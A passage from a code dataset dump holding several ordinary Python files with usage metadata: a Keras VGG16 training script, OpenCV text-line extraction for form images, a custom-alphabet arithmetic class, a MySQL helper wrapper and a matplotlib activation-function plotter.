'categorical')\n\nSTEP_SIZE_TRAIN=training_set.n//training_set.batch_size\nSTEP_SIZE_TEST=test_set.n//test_set.batch_size\n\nIMAGE_SIZE = [224, 224]\nvgg = VGG16(input_shape=IMAGE_SIZE + [3], weights='imagenet', include_top=False)\n#here [3] denotes for RGB images(3 channels)\n\n#don't train existing weights\nfor layer in vgg.layers:\n layer.trainable = False\n \nx = Flatten()(vgg.output)\nprediction = Dense(6, activation='softmax')(x)\nmodel = Model(inputs=vgg.input, outputs=prediction)\nmodel.compile(loss='categorical_crossentropy',\n optimizer=optimizers.Adam(),\n metrics=['accuracy'])\nmodel.summary()\n\nfrom datetime import datetime\nfrom keras.callbacks import ModelCheckpoint, LearningRateScheduler\nfrom keras.callbacks import ReduceLROnPlateau\nlr_reducer = ReduceLROnPlateau(factor=np.sqrt(0.1),\n cooldown=0,\n patience=5,\n min_lr=0.5e-6)\ncheckpoint = 
ModelCheckpoint(filepath='mymodel.h5', \n verbose=1, save_best_only=True)\ncallbacks = [checkpoint, lr_reducer]\nstart = datetime.now()\nhistory = model.fit_generator(training_set, \n steps_per_epoch=STEP_SIZE_TRAIN, \n epochs = 50, verbose=5, callbacks=callbacks)\nduration = datetime.now() - start\nprint(\"Training completed in time: \", duration)\n\nscore = model.evaluate(test_set)\nprint('Test Loss:', score[0])\nprint('Test accuracy:', score[1])\n\n#print(history.history[\"f1\"])\nmodel.save('storedAllClassCNN.h5')\n\nshutil.rmtree(\"../../../ECE_Senior_Design_Our_Data/specsForMulticlassCNN\") ", "sub_path": "findResults/utilities/createAllClassCNNModel.py", "file_name": "createAllClassCNNModel.py", "file_ext": "py", "file_size_in_byte": 10752, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "os.listdir", "line_number": 44, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 44, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 44, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 45, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 45, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 45, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 46, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 46, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 46, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 47, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 47, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 47, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 48, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 48, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 48, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 49, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 49, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 49, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 61, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 62, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 63, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 65, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 66, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 67, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 69, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 70, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 71, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 73, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 74, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 75, "usage_type": "call"}, {"api_name": "os.mkdir", "line_number": 77, "usage_type": "call"}, {"api_name": "os.mkdir", "line_number": 78, "usage_type": "call"}, {"api_name": "os.mkdir", "line_number": 79, "usage_type": "call"}, {"api_name": "os.mkdir", "line_number": 81, "usage_type": "call"}, {"api_name": "os.mkdir", "line_number": 82, "usage_type": "call"}, {"api_name": "os.mkdir", "line_number": 84, "usage_type": "call"}, {"api_name": 
"os.mkdir", "line_number": 85, "usage_type": "call"}, {"api_name": "os.mkdir", "line_number": 87, "usage_type": "call"}, {"api_name": "os.mkdir", "line_number": 88, "usage_type": "call"}, {"api_name": "os.mkdir", "line_number": 90, "usage_type": "call"}, {"api_name": "os.mkdir", "line_number": 91, "usage_type": "call"}, {"api_name": "os.mkdir", "line_number": 93, "usage_type": "call"}, {"api_name": "os.mkdir", "line_number": 94, "usage_type": "call"}, {"api_name": "os.mkdir", "line_number": 96, "usage_type": "call"}, {"api_name": "os.mkdir", "line_number": 97, "usage_type": "call"}, {"api_name": "shutil.copy", "line_number": 100, "usage_type": "call"}, {"api_name": "shutil.copy", "line_number": 102, "usage_type": "call"}, {"api_name": "shutil.copy", "line_number": 105, "usage_type": "call"}, {"api_name": "shutil.copy", "line_number": 107, "usage_type": "call"}, {"api_name": "shutil.copy", "line_number": 110, "usage_type": "call"}, {"api_name": "shutil.copy", "line_number": 112, "usage_type": "call"}, {"api_name": "shutil.copy", "line_number": 115, "usage_type": "call"}, {"api_name": "shutil.copy", "line_number": 117, "usage_type": "call"}, {"api_name": "shutil.copy", "line_number": 120, "usage_type": "call"}, {"api_name": "shutil.copy", "line_number": 122, "usage_type": "call"}, {"api_name": "shutil.copy", "line_number": 125, "usage_type": "call"}, {"api_name": "shutil.copy", "line_number": 127, "usage_type": "call"}, {"api_name": "keras.preprocessing.image.ImageDataGenerator", "line_number": 131, "usage_type": "call"}, {"api_name": "keras.preprocessing.image.ImageDataGenerator", "line_number": 136, "usage_type": "call"}, {"api_name": "keras.applications.vgg16.VGG16", "line_number": 153, "usage_type": "call"}, {"api_name": "keras.layers.Flatten", "line_number": 160, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 161, "usage_type": "call"}, {"api_name": "keras.models.Model", "line_number": 162, "usage_type": "call"}, {"api_name": "keras.optimizers.Adam", "line_number": 164, "usage_type": "call"}, {"api_name": "keras.optimizers", "line_number": 164, "usage_type": "name"}, {"api_name": "keras.callbacks.ReduceLROnPlateau", "line_number": 171, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 171, "usage_type": "call"}, {"api_name": "keras.callbacks.ModelCheckpoint", "line_number": 175, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 178, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 178, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 182, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 182, "usage_type": "name"}, {"api_name": "shutil.rmtree", "line_number": 192, "usage_type": "call"}]} +{"seq_id": "167326778", "text": "import os\n\nimport cv2\nimport numpy as np\n\nfrom flax_core.segment.utils.denoise_textline import refine_textline\n\n\ndef merge_hor_lines(lines):\n '''\n Merge detected lines whose y-coordinates are in a predefined range\n :param lines:list of lines with their coordinates\n :return: merged lines\n '''\n cp_lines = lines[:]\n i, j = 0, 1\n while i < len(cp_lines) - 1:\n line = cp_lines[i]\n x1, y1, x2, y2 = line[0], line[1], line[2], line[3]\n j = i + 1\n while j < len(cp_lines):\n map_line = cp_lines[j]\n x3, y3, x4, y4 = map_line[0], map_line[1], map_line[2], map_line[3]\n if abs(y1 - y3) < 30:\n cp_lines = np.delete(cp_lines, j, axis=0)\n else:\n i += 1\n j += 1\n break\n return cp_lines\n\n\ndef detect_line(img, debug=False):\n 
\"\"\"\n For clarity a textline is texts laying in a line, while line is straight line which is detected for\n the first step before detect textline\n :param img: input form image contain textline located in multiple row,separating by horizontal\n lines\n :param debug:\n :return:gray image of forms, horizontal lines(include additional lines)\n \"\"\"\n if len(img.shape) > 2:\n hei, wid, _ = img.shape\n else:\n hei, wid = img.shape\n if len(img.shape) > 2:\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n else:\n gray = img\n sub_img = gray[:, int(wid * 0.12): int(wid * 0.88)]\n edges = cv2.Canny(sub_img, 30, 170, apertureSize=7)\n minLineLength = 10\n maxLineGap = 25\n lines = cv2.HoughLinesP(edges, 1, np.pi / 180, 20, minLineLength, maxLineGap)\n sq_lines = np.squeeze(lines)\n hor_lines = sq_lines[abs(sq_lines[:, 1] - sq_lines[:, 3]) < 5]\n sorted_lines = hor_lines[hor_lines[:, 1].argsort()]\n merged_lines = merge_hor_lines(sorted_lines)\n additional_lines = add_lines(merged_lines)\n img_hor = None\n img_sq = None\n img_addition = None\n if debug:\n img_hor = img.copy()\n img_sq = img.copy()\n img_addition = img.copy()\n '''initial'''\n for line in sq_lines:\n x1, y1, x2, y2 = line\n cv2.line(img_sq, (x1, y1), (x2, y2), (0, 0, 255), 4)\n\n '''merge'''\n for line in merged_lines:\n x1, y1, x2, y2 = line\n cv2.line(img, (int(wid * 0.11), y1 + 8), (int(wid * 0.95), y2 + 8), (0, 0, 255), 4)\n\n '''hor'''\n for line in merged_lines:\n x1, y1, x2, y2 = line\n cv2.line(img_hor, (x1, y1), (x2, y2), (0, 0, 255), 4)\n\n '''additional'''\n for line in additional_lines:\n x1, y1, x2, y2 = line\n cv2.line(img_addition, (int(wid * 0.11), y1 + 8), (int(wid * 0.95), y2 + 8), (0, 0, 255), 4)\n\n return gray, additional_lines, img, img_hor, img_sq, img_addition\n\n\ndef add_lines(lines):\n \"\"\"\n Add additional lines to missing position in list detected lines\n so that all lines in list detected lines have the same gap between each other\n :param lines: list of merged horizonal lines, which is short lines in the big gaps, so that\n we need to add additional lines to these gaps\n :return:list of horizontal lines include additional lines\n \"\"\"\n # TODO:\n\n diff = np.diff(lines[:, 1], axis=0)\n sort_dif = np.sort(diff)\n mod = np.median(sort_dif)\n len_additional = 0\n for j, gap in enumerate(diff):\n if gap >= 1.7 * mod:\n base = lines[len_additional + j][1]\n for i in range(1, int(round(gap / mod))):\n lines = np.insert(lines, j + len_additional + 1, (0, base + i * mod,\n 0, base + i * mod), axis=0)\n len_additional += 1\n return lines\n\n\ndef apply_refinement(img, lines, debug):\n '''\n Apply refinement(denoise) on cut textline\n :param img:original form image\n :param lines:list of coordinates of textline image\n :param debug: loaded configuration\n :return:list of refined textlines of a form\n '''\n hei, wid = img.shape\n img_cp = cv2.cvtColor(img.copy(), cv2.COLOR_GRAY2RGB)\n ls_out_imgs = []\n for i in range(len(lines) - 1):\n x1, y1, x2, y2 = lines[i]\n x3, y3, x4, y4 = lines[i + 1]\n if debug:\n cv2.rectangle(img_cp, (int(wid * 0.08), y1 + 15), (int(wid * 0.97), y3 + 8), (255, 0, 255), 2)\n refined_im = refine_textline(img[y1 + 15:y3 + 8, int(wid * 0.08):int(wid * 0.97)])\n ls_out_imgs.append(refined_im)\n return ls_out_imgs, img_cp\n\n\ndef extract_text_line(img, debug):\n '''\n Control the process extract textline for each form\n :param img: form image to extract textline\n :param filepath:path to input image\n :return:list of refined textlines of a form\n '''\n gray, detected_lines, 
out_img_form, img_hor, img_sq, img_addition = \\\n detect_line(img, debug)\n ls_out_imgs, img_cp = apply_refinement(gray, detected_lines, debug)\n return ls_out_imgs, out_img_form, img_hor, img_sq, img_addition, img_cp\n\n\ndef extract_full_textline(dir):\n '''\n Extract textline in a given dir contain many forms\n :param dir: extract textline from list of forms image from a directory\n :return:None\n '''\n out_base_dir = '%s/out_test/' % (dir)\n if not os.path.exists(out_base_dir):\n os.makedirs(out_base_dir)\n for file in os.listdir(dir):\n if file.endswith('.jpg'):\n # file = 'data_for_training-2.jpg'\n filepath = '%s%s' % (dir, file)\n out_dir = filepath[:-4]\n if not os.path.exists(out_dir):\n os.makedirs(out_dir)\n gray, detected_lines = detect_line(filepath, file, out_base_dir, 0)\n apply_refinement(gray, detected_lines, out_dir, out_base_dir, file, 0)\n", "sub_path": "flax_core/segment/utils/line_detection.py", "file_name": "line_detection.py", "file_ext": "py", "file_size_in_byte": 5819, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "numpy.delete", "line_number": 25, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 47, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 47, "usage_type": "attribute"}, {"api_name": "cv2.Canny", "line_number": 51, "usage_type": "call"}, {"api_name": "cv2.HoughLinesP", "line_number": 54, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 54, "usage_type": "attribute"}, {"api_name": "numpy.squeeze", "line_number": 55, "usage_type": "call"}, {"api_name": "cv2.line", "line_number": 70, "usage_type": "call"}, {"api_name": "cv2.line", "line_number": 75, "usage_type": "call"}, {"api_name": "cv2.line", "line_number": 80, "usage_type": "call"}, {"api_name": "cv2.line", "line_number": 85, "usage_type": "call"}, {"api_name": "numpy.diff", "line_number": 100, "usage_type": "call"}, {"api_name": "numpy.sort", "line_number": 101, "usage_type": "call"}, {"api_name": "numpy.median", "line_number": 102, "usage_type": "call"}, {"api_name": "numpy.insert", "line_number": 108, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 123, "usage_type": "call"}, {"api_name": "cv2.COLOR_GRAY2RGB", "line_number": 123, "usage_type": "attribute"}, {"api_name": "cv2.rectangle", "line_number": 129, "usage_type": "call"}, {"api_name": "flax_core.segment.utils.denoise_textline.refine_textline", "line_number": 130, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 155, "usage_type": "call"}, {"api_name": "os.path", "line_number": 155, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 156, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 157, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 162, "usage_type": "call"}, {"api_name": "os.path", "line_number": 162, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 163, "usage_type": "call"}]} +{"seq_id": "452094804", "text": "import config as c\nimport numpy as np\nimport pandas as pd\n\n\n\ndef print_table(t):\n df = pd.DataFrame(t)\n print(df)\n print()\n\n\nclass Arithmetic:\n def __init__(self, alphabet, plus_one, r=8, zero=0, one=1):\n self.alphabet = alphabet\n self.plus_one = [alphabet.index(x) for x in plus_one]\n self.r = r\n self.n = len(alphabet)\n self.zero = zero\n self.one = one\n self.add, self.addOV, self.mul, self.mulOV = [np.zeros((self.n, self.n), dtype=int) for i in range(4)]\n 
self.order = [zero, one]\n for i in range(2, self.n):\n self.order.append(self.plus_one[self.order[i-1]])\n for i in range(self.n):\n for j in range(self.n):\n self.add[i, j], self.addOV[i, j] = self.sum_ov(i, j)\n self.mul[i, j], self.mulOV[i, j] = self.mul_ov(i, j)\n print(\"Order: \", self.order)\n print(\"Add table: \\n\")\n print_table(self.add)\n print(\"Add overflow table: \\n\")\n print_table(self.addOV)\n print(\"Mul talbe: \\n\")\n print_table(self.mul)\n print(\"Mul overflow table: \\n\")\n print_table(self.mulOV)\n\n def sum_ov(self, i, j):\n ov = self.zero\n r = self.zero\n while r != j:\n i = self.plus_one[i]\n r = self.plus_one[r]\n if i == self.zero:\n ov = self.plus_one[self.zero]\n return i, ov\n\n def mul_ov(self, i, j):\n ov = self.zero\n m = self.zero\n s = self.zero\n while m != j:\n s, current_ov = self.sum_ov(s, i)\n ov = self.sum_ov(ov, current_ov)[0]\n m = self.plus_one[m]\n return s, ov\n\n#16723450\nclass Num:\n a = Arithmetic(alphabet='01234567', plus_one='16723450')\n r = a.r\n n = a.n\n zero = a.zero\n one = a.one\n order = a.order\n alphabet = a.alphabet\n plus_one = a.plus_one\n add, addOV, mul, mulOV = a.add, a.addOV, a.mul, a.mulOV\n min = alphabet[order[-3]] + alphabet[order[0]]*(r-1)\n max = alphabet[order[-4]] + alphabet[order[-1]]*(r-1)\n\n def __init__(self, arg=a.alphabet[a.zero]*a.r):\n self.remainder = None\n if len(arg) > Num.r:\n c.ErrorText = \"Too many symbols in a word: {} !\".format(arg) + \" Max is {}\".format(Num.r)\n raise ArithmeticError\n if isinstance(arg, list):\n arg = ''.join([str(x) for x in arg])\n for j in arg:\n if j not in Num.alphabet:\n c.ErrorText = \"Wrong symbol in a word: {} : \".format(arg) + \"{}. Set of correct symbols for word: {}\".format(j, Num.alphabet)\n raise ArithmeticError\n self.word = [Num.zero]*(Num.a.r - len(arg)) + [Num.a.alphabet.index(x) for x in arg]\n\n def __getitem__(self, item):\n assert item < Num.a.r\n return self.word[item]\n\n def __setitem__(self, key, value):\n assert key < Num.a.r\n self.word[key] = value\n\n def __add__(self, other):\n carry_over = Num.a.zero\n overflow = Num.a.zero\n isNeg1, isNeg2 = [1 if x[0] in Num.a.order[-3:] else 0 for x in (self, other)]\n res = Num()\n for i in reversed(range(Num.a.r)):\n sum = Num.add[self[i], other[i]]\n overflow = Num.addOV[self[i], other[i]]\n res[i] = Num.add[sum, carry_over]\n carry_over = overflow if overflow else Num.addOV[sum, carry_over]\n isNeg = 1 if res[0] in Num.order[-3:] else 0\n if carry_over or (isNeg1 == isNeg2 and isNeg1 != isNeg):\n c.OverflowFlag = True\n return res\n\n def __mul__(self, other):\n res = Num()\n k = 0\n for i in reversed(range(Num.r)):\n tmp = Num()\n ov_mul = ov_sum = Num.zero\n for j in reversed(range(Num.r)):\n if j-k < 0:\n break\n product = Num.mul[self[j], other[i]]\n tmp[j-k] = Num.add[product, ov_mul]\n ov1 = Num.addOV[product, ov_mul]\n ov2 = Num.addOV[tmp[j-k], ov_sum]\n tmp[j-k] = Num.add[tmp[j-k], ov_sum]\n ov_mul = Num.mulOV[self[j], other[i]]\n ov_sum = Num.add[ov1, ov2]\n # if not (Num(str(ov_sum))+Num(str(ov_mul))).isnull():\n # c.OverflowFlag = True\n k += 1\n res = res + tmp\n return res\n\n def __sub__(self, other):\n complement = Num()\n for j in range(Num.a.r):\n complement[j] = np.where(Num.add[other[j]] == Num.a.order[-1])[0][0]\n complement = complement + Num([Num.zero]*(Num.r-1) + [Num.one])\n return self + complement\n\n def compare(self, other, isStrict=False):\n k = 0\n while k < Num.r and self[k] == other[k]:\n k += 1\n if k == Num.r:\n return not isStrict\n isNeg1, isNeg2 = [1 if 
x[0] in Num.a.order[-3:] else 0 for x in (self, other)]\n if not isNeg1 and not isNeg2:\n if Num.a.order.index(self[k]) < Num.a.order.index(other[k]):\n return False\n return True\n if isNeg1 and not isNeg2:\n return False\n if isNeg2 and not isNeg1:\n return True\n return other.abc().compare(self.abc(), isStrict)\n\n def isnull(self):\n for d in self.word:\n if d != self.zero:\n return False\n return True\n\n def abc(self):\n if self[0] in (Num.order[-3:]):\n return Num()-self\n return self\n\n def __truediv__(self, other):\n res = Num()\n if other.isnull() and self.isnull():\n c.ErrorText = \"[-\" + (Num()-Num(Num.min)).__repr__() + \", \" + (Num(Num.max)).__repr__() + \"]\"\n raise ArithmeticError\n if other.isnull():\n c.ErrorText = \"Division by zero: undefined value!\"\n raise ArithmeticError\n isPos1 = self.compare(Num(), True)\n isPos2 = other.compare(Num(), True)\n a = self.abc()\n b = other.abc()\n while a.compare(b):\n a = a - b\n res = res + Num(Num.a.alphabet[Num.one])\n\n res.remainder = a\n if not isPos1:\n if a.isnull():\n res = Num()-res\n res.remainder = a\n return res\n res = Num() - (res+Num(Num.alphabet[Num.one]))\n res.remainder = b-a\n return res\n if isPos1 and not isPos2:\n res = Num() - res\n res.remainder = a\n return res\n return res\n\n def __repr__(self):\n res = ''\n #if self.isoverflow:\n # res += \"Warning: overflow happened!\\n\"\n if self.isnull():\n return res + Num.a.alphabet[Num.zero]\n tmp = self\n if self[0] in Num.order[-3:]:\n res += '-'\n tmp = Num(list(map(lambda x: Num.a.order[Num.n-1-Num.a.order.index(x)], self.word)))+Num(Num.alphabet[Num.one])\n res += (''.join(map(lambda x: Num.a.alphabet[x], tmp.word))).lstrip(Num.alphabet[Num.zero])\n if self.remainder is not None:\n res = \"div = \" + res + \" mod = \" + self.remainder.__repr__()\n return res\n", "sub_path": "operations.py", "file_name": "operations.py", "file_ext": "py", "file_size_in_byte": 7142, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "pandas.DataFrame", "line_number": 8, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 21, "usage_type": "call"}, {"api_name": "config.ErrorText", "line_number": 76, "usage_type": "attribute"}, {"api_name": "config.ErrorText", "line_number": 82, "usage_type": "attribute"}, {"api_name": "config.OverflowFlag", "line_number": 106, "usage_type": "attribute"}, {"api_name": "numpy.where", "line_number": 134, "usage_type": "call"}, {"api_name": "config.ErrorText", "line_number": 169, "usage_type": "attribute"}, {"api_name": "config.ErrorText", "line_number": 172, "usage_type": "attribute"}]} +{"seq_id": "457999092", "text": "#!/usr/bin/env python\n#_*_coding:utf-8_*_\n#import json,random\nimport pymysql\nimport time\nimport json\nfrom tools.tools import Get_Sql_Insert,Get_Sql_Detele,Get_Sql_Select,Get_Sql_Update\n\nclass DB: \n conn = None\n db = None\n host = None\n def __init__(self, host, mysql_user, mysql_pass, mysql_db):\n self.host = host\n self.mysql_user = mysql_user\n self.mysql_pass = mysql_pass\n self.mysql_db = mysql_db\n def connect(self):\n #self.conn = pymysql.connect(host=self.host, user=self.mysql_user, passwd=self.mysql_pass, db=self.mysql_db, charset=\"utf8\", connect_timeout=600, compress=True,cursorclass = pymysql.cursors.DictCursor)\n self.conn = pymysql.connect(host=self.host, user=self.mysql_user, passwd=self.mysql_pass, db=self.mysql_db, charset=\"utf8\", connect_timeout=600,)\n\n self.conn.autocommit(True)\n def execute(self, sql):\n try:\n 
cur = self.conn.cursor()\n cur.execute(sql)\n except (AttributeError, pymysql.OperationalError):\n try:\n cur.close()\n self.conn.close()\n except:\n pass\n time.sleep(1)\n try:\n self.connect()\n print (\"reconnect DB\")\n cur = self.conn.cursor()\n cur.execute(sql)\n except (AttributeError, pymysql.OperationalError):\n time.sleep(2)\n self.connect()\n print (\"reconnect DB\")\n cur = self.conn.cursor()\n cur.execute(sql)\n \n return cur\n def Mysql_2_Json(self,data,level=1):\n if level :\n cur = self.execute(data)\n SqlData = cur.fetchall()\n Fields = cur.description\n column_list = []\n rows=[]\n JsonData={}\n for i in Fields:\n column_list.append(i[0])\n total = 0 \n for row in SqlData: \n result = {}\n total = total + 1 \n for x in range(len(column_list)): \n result[column_list[x]] = row[x] \n #jsondata=json.dumps(result,ensure_ascii=False) \n rows.append(result)\n JsonData[\"total\"] = total\n JsonData[\"rows\"]= rows\n return json.dumps(JsonData)\n else :\n data = json.loads(data)\n if data[\"SqlType\"] == \"Insert\":\n for cur in data[\"rows\"]:\n print(type(cur))\n a= Get_Sql_Insert(data[\"SqlTable\"],cur)\n print(a)\n elif data[\"SqlType\"] == \"Detele\":\n for cur in data[\"rows\"]:\n print(type(cur))\n sql= Get_Sql_Detele(data[\"SqlTable\"],cur)\n print(self.execute(sql))\n \n elif data[\"SqlType\"] == \"Update\":\n for cur in data[\"rows\"]:\n UUID={}\n UUID[\"UUID\"]=cur[\"UUID\"]\n cur.pop(\"UUID\")\n cur.pop(\"Asset_Number\")\n sql= Get_Sql_Update(data[\"SqlTable\"],cur,UUID)\n print(self.execute(sql))\n \n elif data[\"SqlType\"] == \"Select\":\n print(data)\n for cur in data[\"rows\"]:\n print(type(cur))\n a= Get_Sql_Select(data[\"SqlTable\"],cur)\n print(a)\n else:\n print(\"error\")\n \n", "sub_path": "dbutil/dbutil.py", "file_name": "dbutil.py", "file_ext": "py", "file_size_in_byte": 3576, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "pymysql.connect", "line_number": 20, "usage_type": "call"}, {"api_name": "pymysql.OperationalError", "line_number": 27, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 33, "usage_type": "call"}, {"api_name": "pymysql.OperationalError", "line_number": 39, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 40, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 67, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 69, "usage_type": "call"}, {"api_name": "tools.tools.Get_Sql_Insert", "line_number": 73, "usage_type": "call"}, {"api_name": "tools.tools.Get_Sql_Detele", "line_number": 78, "usage_type": "call"}, {"api_name": "tools.tools.Get_Sql_Update", "line_number": 87, "usage_type": "call"}, {"api_name": "tools.tools.Get_Sql_Select", "line_number": 94, "usage_type": "call"}]} +{"seq_id": "223350589", "text": "import math\nimport matplotlib.mlab as mlab\nimport matplotlib.pyplot as plt\nfrom matplotlib.backends.backend_pdf import PdfPages\n\ndef gen_x(xmin, xmax, count):\n xs = []\n dx = (xmax - xmin) / count\n for k in range(count + 1):\n x = xmin + k * dx\n xs.append(x)\n return xs\n\ndef gen_ewave(xs, alpha, ys, labels):\n ys.append(list(map(lambda x : 2 * alpha * x / (math.exp(-alpha * x) + math.exp(+alpha * x)), xs)))\n labels.append(\"{}*x/(exp(-{}*x) + exp(+{}*x))\".format(alpha, alpha, alpha))\n\ndef gen_pwave(xs, degree, ys, labels):\n ys.append(list(map(lambda x : x / (1 + x**degree), xs)))\n labels.append(\"x/(1+x^{})\".format(degree))\n\ndef gen_snorm(xs, ys, labels):\n 
ys.append(list(map(lambda x : x / math.sqrt(1 + x**2), xs)))\n labels.append(\"x/sqrt(1+x^2)\")\n\ndef gen_tanh(xs, ys, labels):\n ys.append(list(map(lambda x : math.tanh(x), xs)))\n labels.append(\"tanh(x)\")\n\ndef gen_sin(xs, ys, labels):\n ys.append(list(map(lambda x : math.sin(x), xs)))\n labels.append(\"sin(x)\")\n\ndef plot(ppath, title, xs, ys, labels, styles):\n with PdfPages(ppath) as pdf:\n plt.xlabel(\"x\", fontsize = \"smaller\")\n plt.ylabel(\"y\", fontsize = \"smaller\")\n plt.title(title, weight = \"bold\")\n for y, label, style in zip(ys, labels, styles):\n plt.plot(xs, y, style, label = label)\n plt.legend(fontsize = \"smaller\", loc = \"upper left\")\n plt.grid(True)\n pdf.savefig()\n plt.close()\n\ndef plot_pwaves(ppath, xmin = -10, xmax = 10):\n xs = gen_x(xmin, xmax, 1000)\n ys = []\n labels = []\n gen_pwave(xs, 2, ys, labels)\n gen_pwave(xs, 4, ys, labels)\n gen_pwave(xs, 6, ys, labels)\n gen_pwave(xs, 8, ys, labels)\n plot(ppath, \"polynomial wave activations\", xs, ys, labels, [\"r-\", \"g-\", \"b-\", \"k-\"])\n\ndef plot_ewaves(ppath, xmin = -10, xmax = 10):\n xs = gen_x(xmin, xmax, 1000)\n ys = []\n labels = []\n gen_ewave(xs, 1, ys, labels)\n gen_ewave(xs, 2, ys, labels)\n gen_ewave(xs, 3, ys, labels)\n gen_ewave(xs, 4, ys, labels)\n plot(ppath, \"exponential wave activations\", xs, ys, labels, [\"r-\", \"g-\", \"b-\", \"k-\"])\n\ndef plot_snorms(ppath, xmin = -10, xmax = 10):\n xs = gen_x(xmin, xmax, 1000)\n ys = []\n labels = []\n gen_snorm(xs, ys, labels)\n gen_tanh(xs, ys, labels)\n gen_sin(xs, ys, labels)\n gen_pwave(xs, 2, ys, labels)\n plot(ppath, \"[-1, +1] normalization activations\", xs, ys, labels, [\"r-\", \"g-\", \"b-\", \"k-\"])\n\nplot_pwaves(\"activations_pwave.pdf\")\nplot_ewaves(\"activations_ewave.pdf\")\nplot_snorms(\"activations_snorm.pdf\")\n", "sub_path": "scripts/plot_activations.py", "file_name": "plot_activations.py", "file_ext": "py", "file_size_in_byte": 2815, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "math.exp", "line_number": 15, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 23, "usage_type": "call"}, {"api_name": "math.tanh", "line_number": 27, "usage_type": "call"}, {"api_name": "math.sin", "line_number": 31, "usage_type": "call"}, {"api_name": "matplotlib.backends.backend_pdf.PdfPages", "line_number": 35, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 36, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 36, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 37, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 37, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 38, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 38, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 40, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 40, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 41, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 41, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.grid", "line_number": 42, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 42, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 44, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 44, "usage_type": "name"}]} +{"seq_id": 
